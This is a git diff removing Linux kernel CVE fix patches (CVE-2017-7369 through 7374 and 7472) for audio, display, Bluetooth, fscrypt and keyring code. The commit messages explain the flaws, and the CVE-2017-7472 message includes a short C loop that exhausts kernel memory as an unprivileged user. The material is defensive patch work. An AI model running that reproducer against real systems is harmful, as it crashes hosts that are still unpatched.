index 2af50f01..00000000
--- a/Patches/Linux_CVEs/CVE-2017-7369/3.18/0002.patch
+++ /dev/null
@@ -1,50 +0,0 @@
-From ae8f1d5f60644983aba7fbab469d0e542a187c6e Mon Sep 17 00:00:00 2001
-From: Walter Yang
-Date: Thu, 2 Mar 2017 12:13:34 +0800
-Subject: ASoC: Add backend user count checking
-
-Add backend user count checking to protect the index
-boundary.
-
-Change-Id: Ic1b61d1f7130252cc54da0b16553858714988dbd
-CRs-Fixed: 2009216
-Signed-off-by: Walter Yang
----
- sound/soc/soc-compress.c | 5 +++++
- sound/soc/soc-pcm.c | 4 ++++
- 2 files changed, 9 insertions(+)
-
-diff --git a/sound/soc/soc-compress.c b/sound/soc/soc-compress.c
-index 832f221f..a56e2e5 100644
---- a/sound/soc/soc-compress.c
-+++ b/sound/soc/soc-compress.c
-@@ -533,6 +533,11 @@ static int soc_compr_set_params_fe(struct snd_compr_stream *cstream,
- cstream, &async_domain);
- } else {
- be_list[j++] = be;
-+ if (j == DPCM_MAX_BE_USERS) {
-+ dev_dbg(fe->dev,
-+ "ASoC: MAX backend users!\n");
-+ break;
-+ }
- }
- }
- for (i = 0; i < j; i++) {
-diff --git a/sound/soc/soc-pcm.c b/sound/soc/soc-pcm.c
-index 6c44757..e6de6ad 100644
---- a/sound/soc/soc-pcm.c
-+++ b/sound/soc/soc-pcm.c
-@@ -2320,6 +2320,10 @@ void dpcm_be_dai_prepare_async(struct snd_soc_pcm_runtime *fe, int stream,
- dpcm, domain);
- } else {
- dpcm_async[i++] = dpcm;
-+ if (i == DPCM_MAX_BE_USERS) {
-+ dev_dbg(fe->dev, "ASoC: MAX backend users!\n");
-+ break;
-+ }
- }
- }
-
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-7369/4.4/0003.patch b/Patches/Linux_CVEs/CVE-2017-7369/4.4/0003.patch
deleted file mode 100644
index 457e6d96..00000000
--- a/Patches/Linux_CVEs/CVE-2017-7369/4.4/0003.patch
+++ /dev/null
@@ -1,50 +0,0 @@
-From 05f4374845738d2146075e77d9139e60a558de18 Mon Sep 17 00:00:00 2001
-From: Walter Yang
-Date: Thu, 2 Mar 2017 12:13:34 +0800
-Subject: ASoC: Add backend user count checking
-
-Add backend user count checking to protect the index
-boundary.
-
-Change-Id: Ic1b61d1f7130252cc54da0b16553858714988dbd
-CRs-Fixed: 2009216
-Signed-off-by: Walter Yang
----
- sound/soc/soc-compress.c | 5 +++++
- sound/soc/soc-pcm.c | 4 ++++
- 2 files changed, 9 insertions(+)
-
-diff --git a/sound/soc/soc-compress.c b/sound/soc/soc-compress.c
-index eb894d0..736b9c4 100644
---- a/sound/soc/soc-compress.c
-+++ b/sound/soc/soc-compress.c
-@@ -527,6 +527,11 @@ static int soc_compr_set_params_fe(struct snd_compr_stream *cstream,
- cstream, &async_domain);
- } else {
- be_list[j++] = be;
-+ if (j == DPCM_MAX_BE_USERS) {
-+ dev_dbg(fe->dev,
-+ "ASoC: MAX backend users!\n");
-+ break;
-+ }
- }
- }
- for (i = 0; i < j; i++) {
-diff --git a/sound/soc/soc-pcm.c b/sound/soc/soc-pcm.c
-index 13649f9..0ba9dfb 100644
---- a/sound/soc/soc-pcm.c
-+++ b/sound/soc/soc-pcm.c
-@@ -2403,6 +2403,10 @@ void dpcm_be_dai_prepare_async(struct snd_soc_pcm_runtime *fe, int stream,
- dpcm, domain);
- } else {
- dpcm_async[i++] = dpcm;
-+ if (i == DPCM_MAX_BE_USERS) {
-+ dev_dbg(fe->dev, "ASoC: MAX backend users!\n");
-+ break;
-+ }
- }
- }
-
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-7370/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-7370/ANY/0001.patch
deleted file mode 100644
index ca2c40fc..00000000
--- a/Patches/Linux_CVEs/CVE-2017-7370/ANY/0001.patch
+++ /dev/null
@@ -1,50 +0,0 @@
-From 970edf007fbe64b094437541a42477d653802d85 Mon Sep 17 00:00:00 2001
-From: Benjamin Chan
-Date: Mon, 6 Mar 2017 11:48:27 -0500
-Subject: msm: mdss: Add lock to avoid release of active session in rotator
-
-Add mutex lock to protect an active rotator session from being closed.
-Without the lock, this can happen if a rotator closing IOCTL is
-called from a separate thread.
-
-CRs-Fixed: 2006159
-Change-Id: I927a0c626bdae5ef149e12979ec4befdbac1b7f7
-Signed-off-by: Benjamin Chan
----
- drivers/video/msm/mdss/mdss_rotator.c | 5 ++++-
- 1 file changed, 4 insertions(+), 1 deletion(-)
-
-diff --git a/drivers/video/msm/mdss/mdss_rotator.c b/drivers/video/msm/mdss/mdss_rotator.c
-index f23a05c..f3c40cf 100644
---- a/drivers/video/msm/mdss/mdss_rotator.c
-+++ b/drivers/video/msm/mdss/mdss_rotator.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2014-2016, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2014-2017, The Linux Foundation. All rights reserved.
- *
- * This program is free software; you can redistribute it and/or modify
- * it under the terms of the GNU General Public License version 2 and
-@@ -2059,10 +2059,12 @@ static int mdss_rotator_config_session(struct mdss_rot_mgr *mgr,
- return ret;
- }
-
-+ mutex_lock(&mgr->lock);
- perf = mdss_rotator_find_session(private, config.session_id);
- if (!perf) {
- pr_err("No session with id=%u could be found\n",
- config.session_id);
-+ mutex_unlock(&mgr->lock);
- return -EINVAL;
- }
-
-@@ -2085,6 +2087,7 @@ static int mdss_rotator_config_session(struct mdss_rot_mgr *mgr,
- config.output.format);
- done:
- ATRACE_END(__func__);
-+ mutex_unlock(&mgr->lock);
- return ret;
- }
-
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-7371/3.18/0001.patch b/Patches/Linux_CVEs/CVE-2017-7371/3.18/0001.patch
deleted file mode 100644
index 19b01e18..00000000
--- a/Patches/Linux_CVEs/CVE-2017-7371/3.18/0001.patch
+++ /dev/null
@@ -1,45 +0,0 @@
-From 9d5a0bc7f6318821fddf9fc0ac9a05e58bb00a6b Mon Sep 17 00:00:00 2001
-From: Sungjun Park
-Date: Mon, 23 Jan 2017 13:28:44 -0800
-Subject: bluetooth: Fix free data pointer routine
-
-Data pointer has been reused after freed it. So,
-it has been moved to after using the data pointer
-to clean up resource and freed it.
-
-Change-Id: Ibc94e092134ff1f36e896c679ade7f639254a24d
-Signed-off-by: Sungjun Park
----
- drivers/bluetooth/btfm_slim.c | 5 +++--
- 1 file changed, 3 insertions(+), 2 deletions(-)
-
-diff --git a/drivers/bluetooth/btfm_slim.c b/drivers/bluetooth/btfm_slim.c
-index 5fb00b9..1c6e256 100644
---- a/drivers/bluetooth/btfm_slim.c
-+++ b/drivers/bluetooth/btfm_slim.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2016, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2017, The Linux Foundation. All rights reserved.
- *
- * This program is free software; you can redistribute it and/or modify
- * it under the terms of the GNU General Public License version 2 and
-@@ -509,7 +509,6 @@ static int btfm_slim_remove(struct slim_device *slim)
- BTFMSLIM_DBG("");
- mutex_destroy(&btfm_slim->io_lock);
- mutex_destroy(&btfm_slim->xfer_lock);
-- kfree(btfm_slim);
- snd_soc_unregister_codec(&slim->dev);
-
- BTFMSLIM_DBG("slim_remove_device() - btfm_slim->slim_ifd");
-@@ -517,6 +516,8 @@ static int btfm_slim_remove(struct slim_device *slim)
-
- BTFMSLIM_DBG("slim_remove_device() - btfm_slim->slim_pgd");
- slim_remove_device(slim);
-+
-+ kfree(btfm_slim);
- return 0;
- }
-
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-7371/4.4/0002.patch b/Patches/Linux_CVEs/CVE-2017-7371/4.4/0002.patch
deleted file mode 100644
index ddf667fc..00000000
--- a/Patches/Linux_CVEs/CVE-2017-7371/4.4/0002.patch
+++ /dev/null
@@ -1,45 +0,0 @@
-From e02e63b8014f7a0a5ea17a5196fb4ef1283fd1fd Mon Sep 17 00:00:00 2001
-From: Sungjun Park
-Date: Mon, 23 Jan 2017 13:28:44 -0800
-Subject: bluetooth: Fix free data pointer routine
-
-Data pointer has been reused after freed it. So,
-it has been moved to after using the data pointer
-to clean up resource and freed it.
-
-Change-Id: Ibc94e092134ff1f36e896c679ade7f639254a24d
-Signed-off-by: Sungjun Park
----
- drivers/bluetooth/btfm_slim.c | 5 +++--
- 1 file changed, 3 insertions(+), 2 deletions(-)
-
-diff --git a/drivers/bluetooth/btfm_slim.c b/drivers/bluetooth/btfm_slim.c
-index a88ae0f..37cc628 100644
---- a/drivers/bluetooth/btfm_slim.c
-+++ b/drivers/bluetooth/btfm_slim.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2016, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2017, The Linux Foundation. All rights reserved.
- *
- * This program is free software; you can redistribute it and/or modify
- * it under the terms of the GNU General Public License version 2 and
-@@ -512,7 +512,6 @@ static int btfm_slim_remove(struct slim_device *slim)
- BTFMSLIM_DBG("");
- mutex_destroy(&btfm_slim->io_lock);
- mutex_destroy(&btfm_slim->xfer_lock);
-- kfree(btfm_slim);
- snd_soc_unregister_codec(&slim->dev);
-
- BTFMSLIM_DBG("slim_remove_device() - btfm_slim->slim_ifd");
-@@ -520,6 +519,8 @@ static int btfm_slim_remove(struct slim_device *slim)
-
- BTFMSLIM_DBG("slim_remove_device() - btfm_slim->slim_pgd");
- slim_remove_device(slim);
-+
-+ kfree(btfm_slim);
- return 0;
- }
-
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-7372/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-7372/ANY/0001.patch
deleted file mode 100644
index e13a06c0..00000000
--- a/Patches/Linux_CVEs/CVE-2017-7372/ANY/0001.patch
+++ /dev/null
@@ -1,127 +0,0 @@
-From 1806be003731d6d4be55e5b940d14ab772839e13 Mon Sep 17 00:00:00 2001
-From: Rahul Sharma
-Date: Thu, 19 Jan 2017 17:01:57 +0530
-Subject: msm: ba: Fix race conditions in debug writes
-
-Use dynamic allocation for debug buffer instead of static.
-This is to avoid race condition which can cause buffer overflows.
-
-Change-Id: I1b4eecb4280843064712ee3b7b52e23f55ab53c3
-Signed-off-by: Rahul Sharma
----
- drivers/video/msm/ba/msm_ba_debug.c | 58 +++++++++++++++++++++++++------------
- 1 file changed, 39 insertions(+), 19 deletions(-)
-
-diff --git a/drivers/video/msm/ba/msm_ba_debug.c b/drivers/video/msm/ba/msm_ba_debug.c
-index a39a0d3..d41d1ab 100644
---- a/drivers/video/msm/ba/msm_ba_debug.c
-+++ b/drivers/video/msm/ba/msm_ba_debug.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2012-2015, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2012-2015,2017 The Linux Foundation. All rights reserved.
- *
- * This program is free software; you can redistribute it and/or modify
- * it under the terms of the GNU General Public License version 2 and
-@@ -13,7 +13,7 @@
-
- #include "msm_ba_debug.h"
-
--#define MAX_DBG_BUF_SIZE 4096
-+#define MAX_DBG_BUF_SIZE 1008
-
- int msm_ba_debug = BA_ERR | BA_WARN;
- int msm_ba_debug_out = BA_OUT_PRINTK;
-@@ -24,11 +24,9 @@ struct debug_buffer {
- u32 filled_size;
- };
-
--static struct debug_buffer dbg_buf;
--
- #define INIT_DBG_BUF(__buf) ({ \
-- __buf.curr = __buf.ptr;\
-- __buf.filled_size = 0; \
-+ __buf->curr = __buf->ptr;\
-+ __buf->filled_size = 0; \
- })
-
- static int dev_info_open(struct inode *inode, struct file *file)
-@@ -58,19 +56,30 @@ static ssize_t dev_info_read(struct file *file, char __user *buf,
- size_t count, loff_t *ppos)
- {
- struct msm_ba_dev *dev_ctxt = file->private_data;
-+ struct debug_buffer *dbg_buf = NULL;
-+ ssize_t size = 0;
-
- if (!dev_ctxt) {
- dprintk(BA_ERR, "Invalid params, dev: 0x%p", dev_ctxt);
- return 0;
- }
-+
-+ dbg_buf = kmalloc(sizeof(struct debug_buffer), GFP_KERNEL);
-+ if (NULL == dbg_buf)
-+ return 0;
-+
- INIT_DBG_BUF(dbg_buf);
-- write_str(&dbg_buf, "===============================");
-- write_str(&dbg_buf, "DEV: 0x%p", dev_ctxt);
-- write_str(&dbg_buf, "===============================");
-- write_str(&dbg_buf, "state: %d", dev_ctxt->state);
-+ write_str(dbg_buf, "===============================");
-+ write_str(dbg_buf, "DEV: 0x%p", dev_ctxt);
-+ write_str(dbg_buf, "===============================");
-+ write_str(dbg_buf, "state: %d", dev_ctxt->state);
-
-- return simple_read_from_buffer(buf, count, ppos,
-- dbg_buf.ptr, dbg_buf.filled_size);
-+ size = simple_read_from_buffer(buf, count, ppos,
-+ dbg_buf->ptr, dbg_buf->filled_size);
-+
-+ kfree(dbg_buf);
-+
-+ return size;
- }
-
- static const struct file_operations dev_info_fops = {
-@@ -155,21 +164,32 @@ static ssize_t inst_info_read(struct file *file, char __user *buf,
- size_t count, loff_t *ppos)
- {
- struct msm_ba_inst *inst = file->private_data;
-+ struct debug_buffer *dbg_buf = NULL;
-+ ssize_t size = 0;
-
- if (!inst) {
- dprintk(BA_ERR, "Invalid params, dev: %p", inst);
- return 0;
- }
-+
-+ dbg_buf = kmalloc(sizeof(struct debug_buffer), GFP_KERNEL);
-+ if (NULL == dbg_buf)
-+ return 0;
-+
- INIT_DBG_BUF(dbg_buf);
-- write_str(&dbg_buf, "===============================");
-- write_str(&dbg_buf, "INSTANCE: %p (%s)", inst,
-+ write_str(dbg_buf, "===============================");
-+ write_str(dbg_buf, "INSTANCE: %p (%s)", inst,
- "BA device");
-- write_str(&dbg_buf, "===============================");
-- write_str(&dbg_buf, "dev: %p", inst->dev_ctxt);
-- write_str(&dbg_buf, "state: %d", inst->state);
-+ write_str(dbg_buf, "===============================");
-+ write_str(dbg_buf, "dev: %p", inst->dev_ctxt);
-+ write_str(dbg_buf, "state: %d", inst->state);
-
-- return simple_read_from_buffer(buf, count, ppos,
-- dbg_buf.ptr, dbg_buf.filled_size);
-+ size = simple_read_from_buffer(buf, count, ppos,
-+ dbg_buf->ptr, dbg_buf->filled_size);
-+
-+ kfree(dbg_buf);
-+
-+ return size;
- }
-
- static const struct file_operations inst_info_fops = {
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-7373/3.10/0001.patch b/Patches/Linux_CVEs/CVE-2017-7373/3.10/0001.patch
deleted file mode 100644
index d7b5ea41..00000000
--- a/Patches/Linux_CVEs/CVE-2017-7373/3.10/0001.patch
+++ /dev/null
@@ -1,33 +0,0 @@
-From eac4a77bb71750b02e91508b15c9aaf4fe2b94ae Mon Sep 17 00:00:00 2001
-From: Sachin Bhayare
-Date: Fri, 23 Dec 2016 11:22:44 +0530
-Subject: msm: mdss: Fix invalid dma attachment during fb shutdown
-
-If DMA attachment fail during fb_mmap, all ION memory will get free. It
-is necessary to reset the fbmem and fb_attachemnt pointer to NULL,
-otherwise during shutdown will perform another free and causing issue.
-
-CRs-Fixed: 1090244
-Change-Id: I92affcf2ce039eecfc72b7c191e058f37815c726
-Signed-off-by: Benjamin Chan
-Signed-off-by: Sachin Bhayare
----
- drivers/video/msm/mdss/mdss_fb.c | 2 ++
- 1 file changed, 2 insertions(+)
-
-diff --git a/drivers/video/msm/mdss/mdss_fb.c b/drivers/video/msm/mdss/mdss_fb.c
-index 2e8092d..c2d1441 100644
---- a/drivers/video/msm/mdss/mdss_fb.c
-+++ b/drivers/video/msm/mdss/mdss_fb.c
-@@ -1660,6 +1660,8 @@ int mdss_fb_alloc_fb_ion_memory(struct msm_fb_data_type *mfd, size_t fb_size)
-
- fb_mmap_failed:
- ion_free(mfd->fb_ion_client, mfd->fb_ion_handle);
-+ mfd->fb_ion_handle = NULL;
-+ mfd->fbmem_buf = NULL;
- return rc;
- }
-
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-7373/4.4/0002.patch b/Patches/Linux_CVEs/CVE-2017-7373/4.4/0002.patch
deleted file mode 100644
index 134f7075..00000000
--- a/Patches/Linux_CVEs/CVE-2017-7373/4.4/0002.patch
+++ /dev/null
@@ -1,34 +0,0 @@
-From e5eb0d3aa6fe62ee437a2269a1802b1a72f61b75 Mon Sep 17 00:00:00 2001
-From: Benjamin Chan
-Date: Thu, 15 Dec 2016 13:46:42 -0500
-Subject: msm: mdss: Fix invalid dma attachment during fb shutdown
-
-If DMA attachment fail during fb_mmap, all ION memory will get free. It
-is necessary to reset the fbmem and fb_attachemnt pointer to NULL,
-otherwise during shutdown will perform another free and causing issue.
-
-CRs-Fixed: 1090244
-Change-Id: I92affcf2ce039eecfc72b7c191e058f37815c726
-Signed-off-by: Benjamin Chan
----
- drivers/video/fbdev/msm/mdss_fb.c | 4 ++++
- 1 file changed, 4 insertions(+)
-
-diff --git a/drivers/video/fbdev/msm/mdss_fb.c b/drivers/video/fbdev/msm/mdss_fb.c
-index 98ca6c3..152879a 100644
---- a/drivers/video/fbdev/msm/mdss_fb.c
-+++ b/drivers/video/fbdev/msm/mdss_fb.c
-@@ -2082,6 +2082,10 @@ err_put:
- dma_buf_put(mfd->fbmem_buf);
- fb_mmap_failed:
- ion_free(mfd->fb_ion_client, mfd->fb_ion_handle);
-+ mfd->fb_attachment = NULL;
-+ mfd->fb_table = NULL;
-+ mfd->fb_ion_handle = NULL;
-+ mfd->fbmem_buf = NULL;
- return rc;
- }
-
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-7374/4.2-4.10/0001.patch b/Patches/Linux_CVEs/CVE-2017-7374/4.2-4.10/0001.patch
deleted file mode 100644
index 55e33c63..00000000
--- a/Patches/Linux_CVEs/CVE-2017-7374/4.2-4.10/0001.patch
+++ /dev/null
@@ -1,251 +0,0 @@ -From 1b53cf9815bb4744958d41f3795d5d5a1d365e2d Mon Sep 17 00:00:00 2001 -From: Eric Biggers -Date: Tue, 21 Feb 2017 15:07:11 -0800 -Subject: fscrypt: remove broken support for detecting keyring key revocation - -Filesystem encryption ostensibly supported revoking a keyring key that -had been used to "unlock" encrypted files, causing those files to become -"locked" again. This was, however, buggy for several reasons, the most -severe of which was that when key revocation happened to be detected for -an inode, its fscrypt_info was immediately freed, even while other -threads could be using it for encryption or decryption concurrently. -This could be exploited to crash the kernel or worse. - -This patch fixes the use-after-free by removing the code which detects -the keyring key having been revoked, invalidated, or expired. Instead, -an encrypted inode that is "unlocked" now simply remains unlocked until -it is evicted from memory. Note that this is no worse than the case for -block device-level encryption, e.g. dm-crypt, and it still remains -possible for a privileged user to evict unused pages, inodes, and -dentries by running 'sync; echo 3 > /proc/sys/vm/drop_caches', or by -simply unmounting the filesystem. In fact, one of those actions was -already needed anyway for key revocation to work even somewhat sanely. -This change is not expected to break any applications. - -In the future I'd like to implement a real API for fscrypt key -revocation that interacts sanely with ongoing filesystem operations --- -waiting for existing operations to complete and blocking new operations, -and invalidating and sanitizing key material and plaintext from the VFS -caches. But this is a hard problem, and for now this bug must be fixed. 
- -This bug affected almost all versions of ext4, f2fs, and ubifs -encryption, and it was potentially reachable in any kernel configured -with encryption support (CONFIG_EXT4_ENCRYPTION=y, -CONFIG_EXT4_FS_ENCRYPTION=y, CONFIG_F2FS_FS_ENCRYPTION=y, or -CONFIG_UBIFS_FS_ENCRYPTION=y). Note that older kernels did not use the -shared fs/crypto/ code, but due to the potential security implications -of this bug, it may still be worthwhile to backport this fix to them. - -Fixes: b7236e21d55f ("ext4 crypto: reorganize how we store keys in the inode") -Cc: stable@vger.kernel.org # v4.2+ -Signed-off-by: Eric Biggers -Signed-off-by: Theodore Ts'o -Acked-by: Michael Halcrow ---- - fs/crypto/crypto.c | 10 +-------- - fs/crypto/fname.c | 2 +- - fs/crypto/fscrypt_private.h | 4 ---- - fs/crypto/keyinfo.c | 52 ++++++++------------------------------------- - 4 files changed, 11 insertions(+), 57 deletions(-) - -diff --git a/fs/crypto/crypto.c b/fs/crypto/crypto.c -index 02a7a92..6d6eca3 100644 ---- a/fs/crypto/crypto.c -+++ b/fs/crypto/crypto.c -@@ -327,7 +327,6 @@ EXPORT_SYMBOL(fscrypt_decrypt_page); - static int fscrypt_d_revalidate(struct dentry *dentry, unsigned int flags) - { - struct dentry *dir; -- struct fscrypt_info *ci; - int dir_has_key, cached_with_key; - - if (flags & LOOKUP_RCU) -@@ -339,18 +338,11 @@ static int fscrypt_d_revalidate(struct dentry *dentry, unsigned int flags) - return 0; - } - -- ci = d_inode(dir)->i_crypt_info; -- if (ci && ci->ci_keyring_key && -- (ci->ci_keyring_key->flags & ((1 << KEY_FLAG_INVALIDATED) | -- (1 << KEY_FLAG_REVOKED) | -- (1 << KEY_FLAG_DEAD)))) -- ci = NULL; -- - /* this should eventually be an flag in d_flags */ - spin_lock(&dentry->d_lock); - cached_with_key = dentry->d_flags & DCACHE_ENCRYPTED_WITH_KEY; - spin_unlock(&dentry->d_lock); -- dir_has_key = (ci != NULL); -+ dir_has_key = (d_inode(dir)->i_crypt_info != NULL); - dput(dir); - - /* -diff --git a/fs/crypto/fname.c b/fs/crypto/fname.c -index 13052b8..37b4989 100644 ---- 
a/fs/crypto/fname.c -+++ b/fs/crypto/fname.c -@@ -350,7 +350,7 @@ int fscrypt_setup_filename(struct inode *dir, const struct qstr *iname, - fname->disk_name.len = iname->len; - return 0; - } -- ret = fscrypt_get_crypt_info(dir); -+ ret = fscrypt_get_encryption_info(dir); - if (ret && ret != -EOPNOTSUPP) - return ret; - -diff --git a/fs/crypto/fscrypt_private.h b/fs/crypto/fscrypt_private.h -index fdbb8af..e39696e 100644 ---- a/fs/crypto/fscrypt_private.h -+++ b/fs/crypto/fscrypt_private.h -@@ -67,7 +67,6 @@ struct fscrypt_info { - u8 ci_filename_mode; - u8 ci_flags; - struct crypto_skcipher *ci_ctfm; -- struct key *ci_keyring_key; - u8 ci_master_key[FS_KEY_DESCRIPTOR_SIZE]; - }; - -@@ -101,7 +100,4 @@ extern int fscrypt_do_page_crypto(const struct inode *inode, - extern struct page *fscrypt_alloc_bounce_page(struct fscrypt_ctx *ctx, - gfp_t gfp_flags); - --/* keyinfo.c */ --extern int fscrypt_get_crypt_info(struct inode *); -- - #endif /* _FSCRYPT_PRIVATE_H */ -diff --git a/fs/crypto/keyinfo.c b/fs/crypto/keyinfo.c -index 02eb6b9..cb3e82a 100644 ---- a/fs/crypto/keyinfo.c -+++ b/fs/crypto/keyinfo.c -@@ -95,6 +95,7 @@ static int validate_user_key(struct fscrypt_info *crypt_info, - kfree(description); - if (IS_ERR(keyring_key)) - return PTR_ERR(keyring_key); -+ down_read(&keyring_key->sem); - - if (keyring_key->type != &key_type_logon) { - printk_once(KERN_WARNING -@@ -102,11 +103,9 @@ static int validate_user_key(struct fscrypt_info *crypt_info, - res = -ENOKEY; - goto out; - } -- down_read(&keyring_key->sem); - ukp = user_key_payload(keyring_key); - if (ukp->datalen != sizeof(struct fscrypt_key)) { - res = -EINVAL; -- up_read(&keyring_key->sem); - goto out; - } - master_key = (struct fscrypt_key *)ukp->data; -@@ -117,17 +116,11 @@ static int validate_user_key(struct fscrypt_info *crypt_info, - "%s: key size incorrect: %d\n", - __func__, master_key->size); - res = -ENOKEY; -- up_read(&keyring_key->sem); - goto out; - } - res = derive_key_aes(ctx->nonce, 
master_key->raw, raw_key); -- up_read(&keyring_key->sem); -- if (res) -- goto out; -- -- crypt_info->ci_keyring_key = keyring_key; -- return 0; - out: -+ up_read(&keyring_key->sem); - key_put(keyring_key); - return res; - } -@@ -169,12 +162,11 @@ static void put_crypt_info(struct fscrypt_info *ci) - if (!ci) - return; - -- key_put(ci->ci_keyring_key); - crypto_free_skcipher(ci->ci_ctfm); - kmem_cache_free(fscrypt_info_cachep, ci); - } - --int fscrypt_get_crypt_info(struct inode *inode) -+int fscrypt_get_encryption_info(struct inode *inode) - { - struct fscrypt_info *crypt_info; - struct fscrypt_context ctx; -@@ -184,21 +176,15 @@ int fscrypt_get_crypt_info(struct inode *inode) - u8 *raw_key = NULL; - int res; - -+ if (inode->i_crypt_info) -+ return 0; -+ - res = fscrypt_initialize(inode->i_sb->s_cop->flags); - if (res) - return res; - - if (!inode->i_sb->s_cop->get_context) - return -EOPNOTSUPP; --retry: -- crypt_info = ACCESS_ONCE(inode->i_crypt_info); -- if (crypt_info) { -- if (!crypt_info->ci_keyring_key || -- key_validate(crypt_info->ci_keyring_key) == 0) -- return 0; -- fscrypt_put_encryption_info(inode, crypt_info); -- goto retry; -- } - - res = inode->i_sb->s_cop->get_context(inode, &ctx, sizeof(ctx)); - if (res < 0) { -@@ -229,7 +215,6 @@ retry: - crypt_info->ci_data_mode = ctx.contents_encryption_mode; - crypt_info->ci_filename_mode = ctx.filenames_encryption_mode; - crypt_info->ci_ctfm = NULL; -- crypt_info->ci_keyring_key = NULL; - memcpy(crypt_info->ci_master_key, ctx.master_key_descriptor, - sizeof(crypt_info->ci_master_key)); - -@@ -273,14 +258,8 @@ retry: - if (res) - goto out; - -- kzfree(raw_key); -- raw_key = NULL; -- if (cmpxchg(&inode->i_crypt_info, NULL, crypt_info) != NULL) { -- put_crypt_info(crypt_info); -- goto retry; -- } -- return 0; -- -+ if (cmpxchg(&inode->i_crypt_info, NULL, crypt_info) == NULL) -+ crypt_info = NULL; - out: - if (res == -ENOKEY) - res = 0; -@@ -288,6 +267,7 @@ out: - kzfree(raw_key); - return res; - } 
-+EXPORT_SYMBOL(fscrypt_get_encryption_info); - - void fscrypt_put_encryption_info(struct inode *inode, struct fscrypt_info *ci) - { -@@ -305,17 +285,3 @@ void fscrypt_put_encryption_info(struct inode *inode, struct fscrypt_info *ci) - put_crypt_info(ci); - } - EXPORT_SYMBOL(fscrypt_put_encryption_info); -- --int fscrypt_get_encryption_info(struct inode *inode) --{ -- struct fscrypt_info *ci = inode->i_crypt_info; -- -- if (!ci || -- (ci->ci_keyring_key && -- (ci->ci_keyring_key->flags & ((1 << KEY_FLAG_INVALIDATED) | -- (1 << KEY_FLAG_REVOKED) | -- (1 << KEY_FLAG_DEAD))))) -- return fscrypt_get_crypt_info(inode); -- return 0; --} --EXPORT_SYMBOL(fscrypt_get_encryption_info); --- -cgit v1.1 - diff --git a/Patches/Linux_CVEs/CVE-2017-7472/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-7472/ANY/0001.patch deleted file mode 100644 index dc8e7e3d..00000000 --- a/Patches/Linux_CVEs/CVE-2017-7472/ANY/0001.patch +++ /dev/null 
@@ -1,182 +0,0 @@ -From 6efda2501976288f10895834ba2782d0df093441 Mon Sep 17 00:00:00 2001 -From: Eric Biggers -Date: Tue, 18 Apr 2017 15:31:09 +0100 -Subject: KEYS: fix keyctl_set_reqkey_keyring() to not leak thread keyrings - -commit c9f838d104fed6f2f61d68164712e3204bf5271b upstream. - -This fixes CVE-2017-7472. - -Running the following program as an unprivileged user exhausts kernel -memory by leaking thread keyrings: - - #include - - int main() - { - for (;;) - keyctl_set_reqkey_keyring(KEY_REQKEY_DEFL_THREAD_KEYRING); - } - -Fix it by only creating a new thread keyring if there wasn't one before. -To make things more consistent, make install_thread_keyring_to_cred() -and install_process_keyring_to_cred() both return 0 if the corresponding -keyring is already present. - -Fixes: d84f4f992cbd ("CRED: Inaugurate COW credentials") -Signed-off-by: Eric Biggers -Signed-off-by: David Howells -Signed-off-by: Greg Kroah-Hartman ---- - security/keys/keyctl.c | 11 ++++------- - security/keys/process_keys.c | 44 +++++++++++++++++++++++++++----------------- - 2 files changed, 31 insertions(+), 24 deletions(-) - -diff --git a/security/keys/keyctl.c b/security/keys/keyctl.c -index af86b35..1187d2f 100644 ---- a/security/keys/keyctl.c -+++ b/security/keys/keyctl.c -@@ -1258,8 +1258,8 @@ error: - * Read or set the default keyring in which request_key() will cache keys and - * return the old setting. - * -- * If a process keyring is specified then this will be created if it doesn't -- * yet exist. The old setting will be returned if successful. -+ * If a thread or process keyring is specified then it will be created if it -+ * doesn't yet exist. The old setting will be returned if successful. 
- */ - long keyctl_set_reqkey_keyring(int reqkey_defl) - { -@@ -1284,11 +1284,8 @@ long keyctl_set_reqkey_keyring(int reqkey_defl) - - case KEY_REQKEY_DEFL_PROCESS_KEYRING: - ret = install_process_keyring_to_cred(new); -- if (ret < 0) { -- if (ret != -EEXIST) -- goto error; -- ret = 0; -- } -+ if (ret < 0) -+ goto error; - goto set; - - case KEY_REQKEY_DEFL_DEFAULT: -diff --git a/security/keys/process_keys.c b/security/keys/process_keys.c -index db91639..162077d 100644 ---- a/security/keys/process_keys.c -+++ b/security/keys/process_keys.c -@@ -125,13 +125,18 @@ error: - } - - /* -- * Install a fresh thread keyring directly to new credentials. This keyring is -- * allowed to overrun the quota. -+ * Install a thread keyring to the given credentials struct if it didn't have -+ * one already. This is allowed to overrun the quota. -+ * -+ * Return: 0 if a thread keyring is now present; -errno on failure. - */ - int install_thread_keyring_to_cred(struct cred *new) - { - struct key *keyring; - -+ if (new->thread_keyring) -+ return 0; -+ - keyring = keyring_alloc("_tid", new->uid, new->gid, new, - KEY_POS_ALL | KEY_USR_VIEW, - KEY_ALLOC_QUOTA_OVERRUN, NULL); -@@ -143,7 +148,9 @@ int install_thread_keyring_to_cred(struct cred *new) - } - - /* -- * Install a fresh thread keyring, discarding the old one. -+ * Install a thread keyring to the current task if it didn't have one already. -+ * -+ * Return: 0 if a thread keyring is now present; -errno on failure. - */ - static int install_thread_keyring(void) - { -@@ -154,8 +161,6 @@ static int install_thread_keyring(void) - if (!new) - return -ENOMEM; - -- BUG_ON(new->thread_keyring); -- - ret = install_thread_keyring_to_cred(new); - if (ret < 0) { - abort_creds(new); -@@ -166,17 +171,17 @@ static int install_thread_keyring(void) - } - - /* -- * Install a process 